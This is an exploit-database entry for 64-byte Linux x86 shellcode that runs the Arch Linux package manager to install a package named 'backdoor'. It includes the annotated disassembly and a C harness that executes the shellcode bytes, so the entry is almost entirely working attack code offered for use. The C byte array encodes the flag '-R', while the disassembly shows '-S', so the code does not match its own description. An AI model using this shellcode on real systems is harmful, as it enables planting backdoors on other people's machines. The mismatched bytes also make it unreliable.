linux/x86 - pacman -S (default package: backdoor) - 64 bytes

2010-01-24T00:00:00
ID 1337DAY-ID-10172
Type zdt
Reporter Jonathan Salwan
Modified 2010-01-24T00:00:00

Description

Exploit for linux/x86 platform in category shellcode

                                        
                                            ==============================================================
Linux i686 - pacman -S  (default package: backdoor) - 64 bytes
==============================================================


/*
 Title  : Linux i686 - pacman -S <package> (default package: backdoor) - 64 bytes
 Author : Jonathan Salwan
 
 Pacman is a software package manager, developed as part of the Arch Linux distribution.
 With this shellcode you can install the backdoor packages.
 
 
 Disassembly of section .text:
 
 08048054 <.text>:
 8048054:   31 c0                   xor    %eax,%eax
 8048056:   31 db                   xor    %ebx,%ebx
 8048058:   31 c9                   xor    %ecx,%ecx
 804805a:   31 d2                   xor    %edx,%edx
 804805c:   31 f6                   xor    %esi,%esi
 804805e:   52                      push   %edx
 804805f:   68 64 6f 6f 72          push   $0x726f6f64  << This is a package
 8048064:   68 62 61 63 6b          push   $0x6b636162  << (backdoor). You can change it.
 8048069:   89 e6                   mov    %esp,%esi
 804806b:   52                      push   %edx
 804806c:   66 68 2d 53             pushw  $0x532d
 8048070:   89 e1                   mov    %esp,%ecx
 8048072:   52                      push   %edx
 8048073:   68 63 6d 61 6e          push   $0x6e616d63
 8048078:   68 6e 2f 70 61          push   $0x61702f6e
 804807d:   68 72 2f 62 69          push   $0x69622f72
 8048082:   68 2f 2f 75 73          push   $0x73752f2f
 8048087:   89 e3                   mov    %esp,%ebx
 8048089:   52                      push   %edx
 804808a:   56                      push   %esi
 804808b:   51                      push   %ecx
 804808c:   53                      push   %ebx
 804808d:   89 e1                   mov    %esp,%ecx
 804808f:   b0 0b                   mov    $0xb,%al
 8048091:   99                      cltd  
 8048092:   cd 80                   int    $0x80
 
 
*/
 
 
#include <stdio.h>
 
int main(void)
{
char shellcode[] = 
 
            "\x31\xc0\x31\xdb\x31\xc9\x31"
            "\xd2\x31\xf6\x52\x68\x64\x6f"
            "\x6f\x72\x68\x62\x61\x63\x6b"     
            "\x89\xe6\x52\x66\x68\x2d\x52"
            "\x89\xe1\x52\x68\x63\x6d\x61"
            "\x6e\x68\x6e\x2f\x70\x61\x68"
            "\x72\x2f\x62\x69\x68\x2f\x2f"
            "\x75\x73\x89\xe3\x52\x56\x51"
            "\x53\x89\xe1\xb0\x0b\x99\xcd"
            "\x80";
 
        printf("Length: %d\n",strlen(shellcode));
    (*(void(*)()) shellcode)();
 
return 0;
}



#  0day.today [2018-04-02]  #